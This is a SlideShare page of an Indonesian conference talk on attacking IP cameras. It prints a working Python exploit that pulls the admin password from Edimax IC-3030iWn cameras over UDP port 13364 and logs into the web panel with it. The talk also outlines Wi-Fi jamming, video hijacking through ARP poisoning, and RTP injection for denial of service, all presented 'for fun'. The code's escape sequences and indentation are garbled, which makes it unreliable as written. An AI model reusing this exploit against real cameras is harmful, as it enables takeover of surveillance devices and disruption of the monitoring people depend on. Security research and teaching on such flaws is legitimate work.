SlideShare una empresa de Scribd logo
1 de 6
Descargar para leer sin conexión
IP Camera : PWNED for Fun
                                   by. Mr. Pick


Internet Protocol Camera biasa disebut dengan IP Camera adalah tipe kamera digital
yang biasa digunakan untuk melakukan pengawasan.
Ada beberapa macam IP Camera , diantaranya adalah :

1. Centralized IP Camera
   IP Camera jenis ini membutuhkan Network Video Recorder (NVR) untuk menangani
   beberapa IP Camera yang terpasang dan dapat melakukan monitoring serta
   perekaman video.




2. Decentralized IP Camera
   IP Camera ini tidak membutuhkan Network Video Recorder (NVR), kamera ini
   mempunyai fungsi recoding didalamnya dan dapat disimpan secara langsung melalui
   media simpan seperti flash disk, hardisk, dan NAS.
Layaknya sebuah komputer, IP Camera juga memiliki IP Address yang dapat terhubung
pada jaringan kabel ataupun jaringan wireless.
IP camera pada saat ini, pada umumnya memiliki fungsi untuk menjalankan Web Server,
FTP, Email, Networking dan Security Protocols. IP Camera dapat secara langsung
melakukan streaming dengan kualitas MJPEG, MPEG-4 atau menggunakan H.264 melalui
beberapa Network Protocols.

Network Protocol yang biasa digunakan untuk melakukan streaming video pada IP
Camera adalah HTTP streaming dan Real-time Transport Protocol (RTP). RTP ditetapkan
sebagai stardar format paket yang digunakan untuk mengirimkan audio dan video
melalui Internet Protocol (IP).
Pada kali ini, akan disampaikan beberapa teknik yang digunakan untuk melakukan
kegiatan attacking terhadap IP Camera. Yes for Fun only...., diantaranya :

1. IP Camera PWNED
   Yaitu teknik mengambil alih sepenuhnya IP Camera. Get Root !! ya, dengan
   memanfaatkan kelemahan teknik pengiriman password pada port=13364.




   Dengan Xploit ini dibuat oleh y3dips, digunakan untuk melakukan penyerangan
   terhadap IP Camera, yaitu IP Camera Edimax series IC-3030iWn.

   xploitnya :
   ------------

   import socket
   import webbrowser
   #target="192.168.1.22"


   def read_pw():
     devmac = "xffxffxffxffxffxff"
     target="192.168.1.22"
     port=13364

      #code="x00x02xffxfd" #broadcast reply
     code="x00x06xffxf9"
     data=devmac+code
     sock =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
     sock.connect((target,port))

      try:

         sock.send(data)
        sock.settimeout(15)
        tmp = sock.recv(4096)
return tmp

      except socket.timeout:

         return None

   def call_browser(target, pw):

       webbrowser.get("firefox" ).open('http://admin/:'+pw+'@'+target+'/index.a
   sp')


   def main():

      data=read_pw()
     data= data[365:377]

      if data != None:
         pw=data.strip("x00")
         print pw
         call_browser(target, pw)

      else:

         print "Socket timeOut"

   main()



2. IP Camera Jamming
   Banyak sekali orang mempergunakan IP Camera berbasis wireless dengan alasan
   mudah dalam implementasinya, tinggal koneksi ke Radio AP saja. Nah, analisisnya
   disini saya akan melakukan kegiatan jamming terhadap Radio AP sehingga IP Camera
   kehilangan koneksi terhadap Radio AP, sehingga IP Camera tidak bisa lagi melakukan
   kegiatan monitoring.
Kegiatan jamming dilakukan dengan aplikasi jamming dengan konsep penyerangan
   langsung pada channel yang digunakan oleh Radio AP.


3. IP Video Replay Attack
   Hal apa lagi yang bisa kita lakukan terhadap IP Camer ? Ya, IP Video Replay Attack,
   yaitu teknis kegiatan Video Hijack terhadap IP Camera dengan menjalankan ARP
   Poisoning terhadap area network.
Karena komunikasi data antara Client (--dalam hal ini user) dengan IP Camera tidak
terenkripsi maka attacker mencoba melakukan dump sebuah file *.pcap menjadi RTP
sessions yang diencode dengan h.264 video codec. Selain sniffing yang bisa dilakukan
ada hal lain yang bisa dilakukan seiring ARP Poisoning, diantaranya :

-   attack an active video call by sending garbage video payload
-   plays the video file on the active video conference
-   attack an active video call by dropping video packets



4. Media Denial Of Service
   Tehnik menyerang IP Camera      yang diawali dengan ARP Poison dan dilajutkan
   menggunakan custom video payload dengan merubah sequence number dan nilai
   timestamp yang digunakan oleh packet RTP yang asli. Setelah user memilih target
   video device yang ingin diserang pada saat session berlangsung, videojak
   mengirimkan payload melalui RTP port yang sudah di custom kepada target.
   Mengirimkan packet audio dan video secara random kepada target, sehingga kualitas
   suara dan video menurun.




    Solusi2 Penyerangan :
    1. Mematikan fungsi wireless dan tatap memanfaatkan Cable RJ45
    2. Upgrade Firmware dengan firware terbaru




Salam,
M. Pick

Más contenido relacionado

Más de idsecconf

Ali - The Journey-Hack Electron App Desktop (MacOS).pdf
Ali - The Journey-Hack Electron App Desktop (MacOS).pdfAli - The Journey-Hack Electron App Desktop (MacOS).pdf
Ali - The Journey-Hack Electron App Desktop (MacOS).pdfidsecconf
 
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...idsecconf
 
Rama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdf
Rama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdfRama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdf
Rama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdfidsecconf
 
Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...
Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...
Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...idsecconf
 
Nosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdf
Nosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdfNosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdf
Nosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdfidsecconf
 
Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...
Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...
Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...idsecconf
 
Utian Ayuba - Profiling The Cloud Crime.pdf
Utian Ayuba - Profiling The Cloud Crime.pdfUtian Ayuba - Profiling The Cloud Crime.pdf
Utian Ayuba - Profiling The Cloud Crime.pdfidsecconf
 
Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...idsecconf
 
Perkembangan infrastruktur kunci publik di indonesia - Andika Triwidada
Perkembangan infrastruktur kunci publik di indonesia - Andika TriwidadaPerkembangan infrastruktur kunci publik di indonesia - Andika Triwidada
Perkembangan infrastruktur kunci publik di indonesia - Andika Triwidadaidsecconf
 
Pentesting react native application for fun and profit - Abdullah
Pentesting react native application for fun and profit - AbdullahPentesting react native application for fun and profit - Abdullah
Pentesting react native application for fun and profit - Abdullahidsecconf
 
Hacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabella
Hacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabellaHacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabella
Hacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabellaidsecconf
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...idsecconf
 
Devsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi Dwianto
Devsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi DwiantoDevsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi Dwianto
Devsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi Dwiantoidsecconf
 
Stream crime
Stream crime Stream crime
Stream crime idsecconf
 
(Paper) Mips botnet worm with open wrt sdk toolchains
(Paper) Mips botnet worm with open wrt sdk toolchains(Paper) Mips botnet worm with open wrt sdk toolchains
(Paper) Mips botnet worm with open wrt sdk toolchainsidsecconf
 
Mips router targeted worm botnet
Mips router targeted worm botnetMips router targeted worm botnet
Mips router targeted worm botnetidsecconf
 
The achilles heel of GPN Card implementation
The achilles heel of GPN Card implementationThe achilles heel of GPN Card implementation
The achilles heel of GPN Card implementationidsecconf
 
iot hacking, smartlockpick
 iot hacking, smartlockpick iot hacking, smartlockpick
iot hacking, smartlockpickidsecconf
 
Paper - semi-automated information gathering tools for subdomain enumeration ...
Paper - semi-automated information gathering tools for subdomain enumeration ...Paper - semi-automated information gathering tools for subdomain enumeration ...
Paper - semi-automated information gathering tools for subdomain enumeration ...idsecconf
 
Reconnaissance not always about resources
Reconnaissance not always about resourcesReconnaissance not always about resources
Reconnaissance not always about resourcesidsecconf
 

Más de idsecconf (20)

Ali - The Journey-Hack Electron App Desktop (MacOS).pdf
Ali - The Journey-Hack Electron App Desktop (MacOS).pdfAli - The Journey-Hack Electron App Desktop (MacOS).pdf
Ali - The Journey-Hack Electron App Desktop (MacOS).pdf
 
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
Muh. Fani Akbar - Infiltrate Into Your AWS Cloud Environment Through Public E...
 
Rama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdf
Rama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdfRama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdf
Rama Tri Nanda - NFC Hacking Hacking NFC Reverse Power Supply Padlock.pdf
 
Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...
Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...
Arief Karfianto - Proposed Security Model for Protecting Patients Data in Ele...
 
Nosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdf
Nosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdfNosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdf
Nosa Shandy - Clickjacking That Worthy-Google Bug Hunting Story.pdf
 
Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...
Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...
Baskoro Adi Pratomo - Evaluasi Perlindungan Privasi Pengguna pada Aplikasi-Ap...
 
Utian Ayuba - Profiling The Cloud Crime.pdf
Utian Ayuba - Profiling The Cloud Crime.pdfUtian Ayuba - Profiling The Cloud Crime.pdf
Utian Ayuba - Profiling The Cloud Crime.pdf
 
Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...Proactive cyber defence through adversary emulation for improving your securi...
Proactive cyber defence through adversary emulation for improving your securi...
 
Perkembangan infrastruktur kunci publik di indonesia - Andika Triwidada
Perkembangan infrastruktur kunci publik di indonesia - Andika TriwidadaPerkembangan infrastruktur kunci publik di indonesia - Andika Triwidada
Perkembangan infrastruktur kunci publik di indonesia - Andika Triwidada
 
Pentesting react native application for fun and profit - Abdullah
Pentesting react native application for fun and profit - AbdullahPentesting react native application for fun and profit - Abdullah
Pentesting react native application for fun and profit - Abdullah
 
Hacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabella
Hacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabellaHacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabella
Hacking oximeter untuk membantu pasien covid19 di indonesia - Ryan fabella
 
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
Vm escape: case study virtualbox bug hunting and exploitation - Muhammad Alif...
 
Devsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi Dwianto
Devsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi DwiantoDevsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi Dwianto
Devsecops: membangun kemampuan soc di dalam devsecops pipeline - Dedi Dwianto
 
Stream crime
Stream crime Stream crime
Stream crime
 
(Paper) Mips botnet worm with open wrt sdk toolchains
(Paper) Mips botnet worm with open wrt sdk toolchains(Paper) Mips botnet worm with open wrt sdk toolchains
(Paper) Mips botnet worm with open wrt sdk toolchains
 
Mips router targeted worm botnet
Mips router targeted worm botnetMips router targeted worm botnet
Mips router targeted worm botnet
 
The achilles heel of GPN Card implementation
The achilles heel of GPN Card implementationThe achilles heel of GPN Card implementation
The achilles heel of GPN Card implementation
 
iot hacking, smartlockpick
 iot hacking, smartlockpick iot hacking, smartlockpick
iot hacking, smartlockpick
 
Paper - semi-automated information gathering tools for subdomain enumeration ...
Paper - semi-automated information gathering tools for subdomain enumeration ...Paper - semi-automated information gathering tools for subdomain enumeration ...
Paper - semi-automated information gathering tools for subdomain enumeration ...
 
Reconnaissance not always about resources
Reconnaissance not always about resourcesReconnaissance not always about resources
Reconnaissance not always about resources
 

Pwned IP Camera for phun: POC (0day) exploit for EDIMAX IC-3030iWn - Hero

  • 1. IP Camera : PWNED for Fun by. Mr. Pick Internet Protocol Camera biasa disebut dengan IP Camera adalah tipe kamera digital yang biasa digunakan untuk melakukan pengawasan. Ada beberapa macam IP Camera , diantaranya adalah : 1. Centralized IP Camera IP Camera jenis ini membutuhkan Network Video Recorder (NVR) untuk menangani beberapa IP Camera yang terpasang dan dapat melakukan monitoring serta perekaman video. 2. Decentralized IP Camera IP Camera ini tidak membutuhkan Network Video Recorder (NVR), kamera ini mempunyai fungsi recoding didalamnya dan dapat disimpan secara langsung melalui media simpan seperti flash disk, hardisk, dan NAS.
  • 2. Layaknya sebuah komputer, IP Camera juga memiliki IP Address yang dapat terhubung pada jaringan kabel ataupun jaringan wireless. IP camera pada saat ini, pada umumnya memiliki fungsi untuk menjalankan Web Server, FTP, Email, Networking dan Security Protocols. IP Camera dapat secara langsung melakukan streaming dengan kualitas MJPEG, MPEG-4 atau menggunakan H.264 melalui beberapa Network Protocols. Network Protocol yang biasa digunakan untuk melakukan streaming video pada IP Camera adalah HTTP streaming dan Real-time Transport Protocol (RTP). RTP ditetapkan sebagai stardar format paket yang digunakan untuk mengirimkan audio dan video melalui Internet Protocol (IP).
  • 3. Pada kali ini, akan disampaikan beberapa teknik yang digunakan untuk melakukan kegiatan attacking terhadap IP Camera. Yes for Fun only...., diantaranya : 1. IP Camera PWNED Yaitu teknik mengambil alih sepenuhnya IP Camera. Get Root !! ya, dengan memanfaatkan kelemahan teknik pengiriman password pada port=13364. Dengan Xploit ini dibuat oleh y3dips, digunakan untuk melakukan penyerangan terhadap IP Camera, yaitu IP Camera Edimax series IC-3030iWn. xploitnya : ------------ import socket import webbrowser #target="192.168.1.22" def read_pw(): devmac = "xffxffxffxffxffxff" target="192.168.1.22" port=13364 #code="x00x02xffxfd" #broadcast reply code="x00x06xffxf9" data=devmac+code sock =socket.socket(socket.AF_INET,socket.SOCK_DGRAM) sock.connect((target,port)) try: sock.send(data) sock.settimeout(15) tmp = sock.recv(4096)
  • 4. return tmp except socket.timeout: return None def call_browser(target, pw): webbrowser.get("firefox" ).open('http://admin/:'+pw+'@'+target+'/index.a sp') def main(): data=read_pw() data= data[365:377] if data != None: pw=data.strip("x00") print pw call_browser(target, pw) else: print "Socket timeOut" main() 2. IP Camera Jamming Banyak sekali orang mempergunakan IP Camera berbasis wireless dengan alasan mudah dalam implementasinya, tinggal koneksi ke Radio AP saja. Nah, analisisnya disini saya akan melakukan kegiatan jamming terhadap Radio AP sehingga IP Camera kehilangan koneksi terhadap Radio AP, sehingga IP Camera tidak bisa lagi melakukan kegiatan monitoring.
  • 5. Kegiatan jamming dilakukan dengan aplikasi jamming dengan konsep penyerangan langsung pada channel yang digunakan oleh Radio AP. 3. IP Video Replay Attack Hal apa lagi yang bisa kita lakukan terhadap IP Camer ? Ya, IP Video Replay Attack, yaitu teknis kegiatan Video Hijack terhadap IP Camera dengan menjalankan ARP Poisoning terhadap area network.
  • 6. Karena komunikasi data antara Client (--dalam hal ini user) dengan IP Camera tidak terenkripsi maka attacker mencoba melakukan dump sebuah file *.pcap menjadi RTP sessions yang diencode dengan h.264 video codec. Selain sniffing yang bisa dilakukan ada hal lain yang bisa dilakukan seiring ARP Poisoning, diantaranya : - attack an active video call by sending garbage video payload - plays the video file on the active video conference - attack an active video call by dropping video packets 4. Media Denial Of Service Tehnik menyerang IP Camera yang diawali dengan ARP Poison dan dilajutkan menggunakan custom video payload dengan merubah sequence number dan nilai timestamp yang digunakan oleh packet RTP yang asli. Setelah user memilih target video device yang ingin diserang pada saat session berlangsung, videojak mengirimkan payload melalui RTP port yang sudah di custom kepada target. Mengirimkan packet audio dan video secara random kepada target, sehingga kualitas suara dan video menurun. Solusi2 Penyerangan : 1. Mematikan fungsi wireless dan tatap memanfaatkan Cable RJ45 2. Upgrade Firmware dengan firware terbaru Salam, M. Pick